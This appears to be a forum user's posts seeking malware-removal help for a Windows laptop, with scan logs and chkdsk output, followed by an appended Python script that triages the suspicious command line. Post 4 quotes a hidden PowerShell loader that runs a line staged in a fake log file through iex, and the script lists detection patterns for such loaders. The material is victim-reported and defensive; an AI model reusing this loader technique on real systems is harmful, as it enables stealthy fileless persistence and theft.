
EffWerd

Members, 9 posts

Everything posted by EffWerd

  1. Thanks, Maurice, for your help, legend - got the scorpion off my back.
  2. Hi Maurice, ESET log attached. No result. Let me know if you think there is possibly more to do, much appreciated. I'll keep an eye on things to see if this rogue process comes back in any case. Thanks!
     Attachment: eset log.txt
  3. Hi Maurice, thanks a lot for your help with this. I ran the MS Safety Scanner, which went fine for 3.5 hours then just stalled out on a particular file... sat there for another hour to see if it would pick up again, but no luck. It did create the msert.log, but nothing in it of value it seems (attached).
     So I went ahead and ran the FRST fix - log is attached. The powershell.exe process didn't return after reboot, so that's good. Interesting how hidden the whole thing is - I think for sure it was definitely something malicious; I did see it trying to scan for what I assume are crypto wallet folders at one stage in Procmon (I forgot to take a screenshot though...).
     Let me know if you think I should try and re-run the MS Safety Scanner tool again - it did count 24 'infected' files before stalling out. Cheers! Let me know if you have a ko-fi account or something, I'll buy you a coffee or two for your help :)
     Attachments: Fixlog.txt, msert.log
  4. Hi, I've got an instance of powershell.exe which keeps coming back and seems to be up to no good. It's using a bit of system resources and has a bit of a suspect command line attached to it:
     "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $a = Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;iex $a;hackbacktrack ko8E7GIIPGwUKDdghNlVPuHA6yXABLHxKS1UBSVQI34=}
     It also seems to be pinging a server and scanning through the file system if I watch it with Procmon. I can kill the process and it doesn't start back up till Windows is restarted. Can't see anything obvious in Autoruns. Have run Windows Defender and Malwarebytes scans but no result. Have attached FRST results. Thanks in advance if you can help.
     Attachments: Addition.txt, FRST.txt
  5. New logs attached. Thanks for helping out, much appreciated.
     Attachments: Addition.txt, FRST.txt
  6. The situation is the same unfortunately. I was reading another post where you helped someone with the same issue. You got them to run a fixlist through FRST outside of Windows, which seemed to resolve it for them. Composing said fixlist and what exactly you had it do is beyond me. Can we deconstruct MBAM outside of Windows with FRST from the command prompt?
  7. Logs as requested:

     Log Name:      Application
     Source:        Microsoft-Windows-Wininit
     Date:          21/11/2016 3:18:22 AM
     Event ID:      1001
     Task Category: None
     Level:         Information
     Keywords:      Classic
     User:          N/A
     Computer:      Kevslaptop
     Description:
     Checking file system on C:
     The type of the file system is NTFS.
     Volume label is Windows.

     A disk check has been scheduled.
     Windows will now check the disk.

     Stage 1: Examining basic file system structure ...
       492032 file records processed.
     File verification completed.
       16758 large file records processed.
       0 bad file records processed.

     Stage 2: Examining file name linkage ...
       592928 index entries processed.
     Index verification completed.
       0 unindexed files scanned.
       0 unindexed files recovered to lost and found.

     Stage 3: Examining security descriptors ...
     Cleaning up 13 unused index entries from index $SII of file 0x9.
     Cleaning up 13 unused index entries from index $SDH of file 0x9.
     Cleaning up 13 unused security descriptors.
     Security descriptor verification completed.
       50449 data files processed.
     CHKDSK is verifying Usn Journal...
       40892616 USN bytes processed.
     Usn Journal verification completed.

     Stage 4: Looking for bad clusters in user file data ...
       492016 files processed.
     File data verification completed.

     Stage 5: Looking for bad, free clusters ...
       94295914 free clusters processed.
     Free space verification is complete.
     CHKDSK discovered free space marked as allocated in the master file table (MFT) bitmap.

     Windows has made corrections to the file system.
     No further action is required.

       953325770 KB total disk space.
       575342392 KB in 245807 files.
          163780 KB in 50450 indexes.
               0 KB in bad sectors.
          635938 KB in use by the system.
           65536 KB occupied by the log file.
       377183660 KB available on disk.

            4096 bytes in each allocation unit.
       238331442 total allocation units on disk.
        94295915 allocation units available on disk.

     Internal Info:
     00 82 07 00 b4 84 04 00 7d 2b 08 00 00 00 00 00  ........}+......
     31 02 01 00 fb 7b 00 00 00 00 00 00 00 00 00 00  1....{..........

     Windows has finished checking your disk.
     Please wait while your computer restarts.

     Event Xml:
     <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
       <System>
         <Provider Name="Microsoft-Windows-Wininit" Guid="{206f6dea-d3c5-4d10-bc72-989f03c8b84b}" EventSourceName="Wininit" />
         <EventID Qualifiers="16384">1001</EventID>
         <Version>0</Version>
         <Level>4</Level>
         <Task>0</Task>
         <Opcode>0</Opcode>
         <Keywords>0x80000000000000</Keywords>
         <TimeCreated SystemTime="2016-11-20T14:18:22.895205100Z" />
         <EventRecordID>5745</EventRecordID>
         <Correlation />
         <Execution ProcessID="0" ThreadID="0" />
         <Channel>Application</Channel>
         <Computer>Kevslaptop</Computer>
         <Security />
       </System>
       <EventData>
         <Data>
     Checking file system on C:
     The type of the file system is NTFS.
     Volume label is Windows.

     A disk check has been scheduled.
     Windows will now check the disk.

     Stage 1: Examining basic file system structure ...
       492032 file records processed.
     File verification completed.
       16758 large file records processed.
       0 bad file records processed.

     Stage 2: Examining file name linkage ...
       592928 index entries processed.
     Index verification completed.
       0 unindexed files scanned.
       0 unindexed files recovered to lost and found.

     Stage 3: Examining security descriptors ...
     Cleaning up 13 unused index entries from index $SII of file 0x9.
     Cleaning up 13 unused index entries from index $SDH of file 0x9.
     Cleaning up 13 unused security descriptors.
     Security descriptor verification completed.
       50449 data files processed.
     CHKDSK is verifying Usn Journal...
       40892616 USN bytes processed.
     Usn Journal verification completed.

     Stage 4: Looking for bad clusters in user file data ...
       492016 files processed.
     File data verification completed.

     Stage 5: Looking for bad, free clusters ...
       94295914 free clusters processed.
     Free space verification is complete.
     CHKDSK discovered free space marked as allocated in the master file table (MFT) bitmap.

     Windows has made corrections to the file system.
     No further action is required.

       953325770 KB total disk space.
       575342392 KB in 245807 files.
          163780 KB in 50450 indexes.
               0 KB in bad sectors.
          635938 KB in use by the system.
           65536 KB occupied by the log file.
       377183660 KB available on disk.

            4096 bytes in each allocation unit.
       238331442 total allocation units on disk.
        94295915 allocation units available on disk.

     Internal Info:
     00 82 07 00 b4 84 04 00 7d 2b 08 00 00 00 00 00  ........}+......
     31 02 01 00 fb 7b 00 00 00 00 00 00 00 00 00 00  1....{..........

     Windows has finished checking your disk.
     Please wait while your computer restarts.
         </Data>
       </EventData>
     </Event>

     Attachment: sfcdetails.txt
  8. Hey, thanks for replying. Chkdsk is running at the moment. Hopefully I will have the log by the morning (2330 here). I ran SFC before and it didn't spit anything back at me, but I'll post the log for that tomorrow as well. Cheers
  9. Hi, I'm having issues getting MBAM or MBAM Clean to run. I keep getting this error: "the application was unable to start correctly 0xc0000279". It seems to be only affecting the operation of MBAM; however, no other malware detection programs seem to be able to pick up on anything. I usually only run MBAM and Windows Defender, but I downloaded AVG and tried scanning with that, and also the ESET online scanner, which turned up nothing. I've tried running Rkill, TDSSKiller, and also FRST in and outside of Windows.

     Computer specs:
     OS Name: Microsoft Windows 10 Home
     Version: 10.0.14393 Build 14393
     Other OS Description: Not Available
     OS Manufacturer: Microsoft Corporation
     System Name: KEVSLAPTOP
     System Manufacturer: Hewlett-Packard
     System Model: HP ENVY 17 Notebook PC
     System Type: x64-based PC
     System SKU: F7P64PA#ABG
     Processor: Intel(R) Core(TM) i7-4700MQ CPU @ 2.40GHz, 2401 Mhz, 4 Core(s), 8 Logical Processor(s)
     BIOS Version/Date: Insyde F.68, 22/07/2016
     SMBIOS Version: 2.7
     Embedded Controller Version: 147.82
     BIOS Mode: UEFI
     BaseBoard Manufacturer: Hewlett-Packard
     BaseBoard Model: Not Available
     BaseBoard Name: Base Board
     Platform Role: Mobile
     Secure Boot State: On
     PCR7 Configuration: Binding Not Possible
     Windows Directory: C:\WINDOWS
     System Directory: C:\WINDOWS\system32
     Boot Device: \Device\HarddiskVolume2
     Locale: New Zealand
     Hardware Abstraction Layer: Version = "10.0.14393.206"
     User Name: Kevslaptop\Kevin
     Time Zone: New Zealand Daylight Time
     Installed Physical Memory (RAM): 8.00 GB
     Total Physical Memory: 7.93 GB
     Available Physical Memory: 5.50 GB
     Total Virtual Memory: 9.18 GB
     Available Virtual Memory: 6.63 GB
     Page File Space: 1.25 GB
     Page File: C:\pagefile.sys
     Hyper-V - VM Monitor Mode Extensions: Yes
     Hyper-V - Second Level Address Translation Extensions: Yes
     Hyper-V - Virtualization Enabled in Firmware: No
     Hyper-V - Data Execution Protection: Yes

     Log files are attached. Any help would be much appreciated. Cheers
     Attachments: Addition.txt, FRST.txt, Rkill.txt, Addition - recovery mode.txt, FRST - recovery mode.txt
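The command line quoted in post 4 is a textbook staged loader: a hidden, non-interactive PowerShell reads one line out of an innocuous-looking "log" file and hands it to iex, so nothing incriminating lives in the command line itself. The Python below is an added example written for this page, not code from the thread, from Malwarebytes, or from any tool named above. It pulls the indicators out of such a command line, works out which file line is actually being executed, and measures any base64-looking argument. The sample inputs are constructed (the first is the post 4 command line verbatim, the second a made-up benign job), the indicator list and the three-indicator threshold are illustrative choices, and the token after "hackbacktrack" is only measured, not interpreted.

```python
import base64
import binascii
import re

# Constructed sample input: the command line quoted in post 4 (verbatim) and a
# made-up benign maintenance job for contrast.
SUSPECT_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'-NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned '
    r'-Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); '
    r'import-module AppvClient; Sync-AppvPublishingServer n; '
    r'$a = Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;'
    r'iex $a;hackbacktrack ko8E7GIIPGwUKDdghNlVPuHA6yXABLHxKS1UBSVQI34=}'
)
BENIGN_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'-NoProfile -File C:\Scripts\nightly-backup.ps1'
)

# powershell.exe accepts any unambiguous prefix of a parameter name (-w for
# -WindowStyle, -noni for -NonInteractive, -ep for -ExecutionPolicy), so the
# patterns match prefixes rather than only the spelled-out names in the post.
INDICATORS = [
    ("hidden_window", re.compile(r"-w\w*\s+hidden", re.I)),
    ("non_interactive", re.compile(r"-noni\w*", re.I)),
    ("exec_policy_override",
     re.compile(r"-e(x\w*|p)\s+(bypass|unrestricted|remotesigned)", re.I)),
    ("invoke_expression",
     re.compile(r"(?<![\w-])(iex|invoke-expression)\b", re.I)),
    ("appv_publishing_sync", re.compile(r"sync-appvpublishingserver", re.I)),
]

# Payload staged as one line of a text file: Get-Content <path> | Select -Index <n>
STAGED_LINE = re.compile(
    r"get-content\s+(?P<path>[^\s|;]+)\s*\|\s*select(-object)?\s+-index\s+(?P<idx>\d+)",
    re.I,
)
# A long run of base64-alphabet characters with optional '=' padding.
B64_TOKEN = re.compile(
    r"(?<![A-Za-z0-9+/=])([A-Za-z0-9+/]{24,}={0,2})(?![A-Za-z0-9+/=])"
)

# Illustrative threshold (an assumption, not a published rule): three
# independent indicators, or any staged payload at all.
SUSPICIOUS_HITS = 3


def base64_tokens(cmdline):
    """Return (token, decoded_length) for arguments that decode as base64.

    Requiring a digit and a length that is a multiple of four keeps ordinary
    cmdlet names such as Sync-AppvPublishingServer out of the result.
    """
    found = []
    for tok in B64_TOKEN.findall(cmdline):
        if len(tok) % 4 or not any(c.isdigit() for c in tok):
            continue
        try:
            found.append((tok, len(base64.b64decode(tok, validate=True))))
        except (binascii.Error, ValueError):
            pass
    return found


def triage(cmdline):
    """Describe a powershell.exe command line: indicators, staged payload, base64 arguments.

    staged["file_line"] is 1-based because Select-Object -Index is 0-based:
    '-Index 17033' reads the 17034th line of the file.
    """
    hits = [name for name, pat in INDICATORS if pat.search(cmdline)]
    staged = None
    m = STAGED_LINE.search(cmdline)
    if m:
        idx = int(m.group("idx"))
        staged = {"path": m.group("path"), "index": idx, "file_line": idx + 1}
    return {
        "indicators": hits,
        "staged": staged,
        "base64_tokens": base64_tokens(cmdline),
        "suspicious": len(hits) >= SUSPICIOUS_HITS or staged is not None,
    }


def staged_payload(lines, index):
    """Return the line that 'Get-Content | Select -Index <index>' would feed to iex.

    'lines' is the staging file split into lines and 'index' the 0-based value
    from the command line. Returns None when the file is shorter than that, in
    which case the PowerShell pipeline yields nothing and iex runs nothing.
    """
    return lines[index] if 0 <= index < len(lines) else None


if __name__ == "__main__":
    for cmd in (SUSPECT_CMDLINE, BENIGN_CMDLINE):
        print(triage(cmd))
```

Two things worth taking from this. Select-Object -Index is zero-based, so the line to look at in system-logs.txt is the 17034th, and the right way to look at it is to copy the file off the machine and read that line, never to let PowerShell evaluate it. And because the command line is the only artefact the loader exposes, the same triage() runs unchanged over whatever you export from Autoruns, Get-ScheduledTask or the WMI event consumers, which are the usual places to look for something that only comes back after a reboot.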